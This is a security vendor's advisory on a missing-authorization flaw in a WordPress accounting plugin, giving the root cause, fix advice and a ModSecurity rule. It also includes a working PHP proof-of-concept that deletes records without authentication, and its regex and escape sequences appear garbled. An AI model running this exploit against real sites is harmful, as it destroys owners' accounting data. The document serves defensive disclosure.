Atomic Edge analysis of CVE-2026-9172 (metadata-based):
This is a Missing Authorization vulnerability in the Devs Accounting – Simple Accounting and Invoicing Solution plugin for WordPress (versions up to 1.2.0). The plugin registers a REST API endpoint at ‘devs-accounting/v1/delete-account/(?Pd+)’ without a permission_callback. This allows unauthenticated attackers to soft-delete arbitrary accounting account records from the ‘wp_dac_accounts’ database table. The CVSS score is 5.3 (Medium).
The root cause, inferred from the CWE classification (862 Missing Authorization) and description, is that the developer registered a REST route using WordPress’s register_rest_route() function but omitted the ‘permission_callback’ argument. In WordPress REST API development, if permission_callback is not explicitly set, WordPress assigns a default permission callback that returns true, granting access to any user including unauthenticated visitors. The delete_single_account() function, which handles the actual deletion logic, lacks any internal capability or nonce check. This is a confirmed pattern based on the endpoint registration description.
To exploit this vulnerability, an attacker simply sends a GET request to the REST endpoint ‘/wp-json/devs-accounting/v1/delete-account/{id}’, where {id} is the numeric ID of any accounting account record. No authentication is required. The attacker can enumerate valid account IDs by brute-forcing sequential IDs or discovering them through other plugin endpoints. Each successful request performs a soft-delete on the targeted record. A simple proof of concept would be: GET /wp-json/devs-accounting/v1/delete-account/1.
Based on the vulnerability type, the fix requires adding a permission_callback to the register_rest_route() call that verifies the current user has appropriate capabilities (e.g., ‘edit_posts’ or a custom capability like ‘delete_accounting_records’). Alternatively, the delete_single_account() function should include an explicit capability check using current_user_can() before performing the deletion. Since the endpoint lacks authorization entirely, adding a permission_callback is the standard remediation.
The direct impact is unauthorized modification of plugin data. An unauthenticated attacker can delete arbitrary accounting account records, potentially causing data loss for the site owner. The vulnerability does not allow privilege escalation or data exfiltration beyond confirming the existence of account records. However, the loss of accounting data could disrupt business operations and financial record-keeping. Since no authenticated session is required, the attack can be automated and executed at scale against any vulnerable installation.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-9172 (metadata-based)
# Block unauthenticated GET requests to the devs-accounting delete-account REST endpoint
# This is a virtual patch: the rule blocks the exploit by matching the exact REST route pattern.
# The rule does not check authentication; it blocks ALL requests to this known-vulnerable endpoint.
# Legitimate admin users should not be affected if the plugin is patched or removed.
SecRule REQUEST_URI "@rx ^/wp-json/devs-accounting/vd+/delete-account/d+"
"id:20269172,phase:2,deny,status:403,log,msg:'CVE-2026-9172 exploitation attempt via REST API',severity:'CRITICAL',tag:'CVE-2026-9172',tag:'wordpress',tag:'devs-accounting'"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9172 - Devs Accounting <= 1.2.0 - Missing Authorization to Unauthenticated Account Deletion via /delete-account/ REST Endpoint
// This PoC demonstrates how an unauthenticated attacker can soft-delete
// arbitrary accounting account records by sending a GET request to the REST endpoint.
// We assume the target site has the vulnerable plugin active.
// Configuration: Set the target WordPress URL below
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site URL
// The REST endpoint path (inferred from CVE description)
$rest_endpoint = '/wp-json/devs-accounting/v1/delete-account/1';
// Build full URL
$full_url = rtrim($target_url, '/') . $rest_endpoint;
// Initialize cURL session
echo "[+] Sending unauthenticated GET request to: $full_urln";
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $full_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_FOLLOWLOCATION => false,
CURLOPT_SSL_VERIFYPEER => false, // For sites with self-signed SSL; remove in production
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);
// Analyze response
if ($error) {
echo "[!] cURL error: $errorn";
exit(1);
}
if ($http_code === 200) {
echo "[+] Request succeeded. HTTP Status: $http_coden";
echo "[+] The account with ID 1 has been soft-deleted (or deletion attempted).n";
echo "[+] Exploitation confirmed: endpoint accessible without authentication.n";
// Optional: print response body for debugging
// echo $response;
} elseif ($http_code === 403 || $http_code === 401) {
echo "[!] Access denied (HTTP $http_code). The endpoint may be protected or patched.n";
} elseif ($http_code === 404) {
echo "[!] Endpoint not found (HTTP 404). Plugin may not be installed or endpoint path differs.n";
} else {
echo "[!] Unexpected HTTP status: $http_coden";
echo "[!] Response (first 500 chars): " . substr($response, 0, 500) . "n";
}
echo "n[*] To target other account IDs, modify the ID in the URL (e.g., /delete-account/2, /delete-account/3).n";
echo "[*] This PoC makes an educated assumption about the endpoint path based on CVE metadata.n";
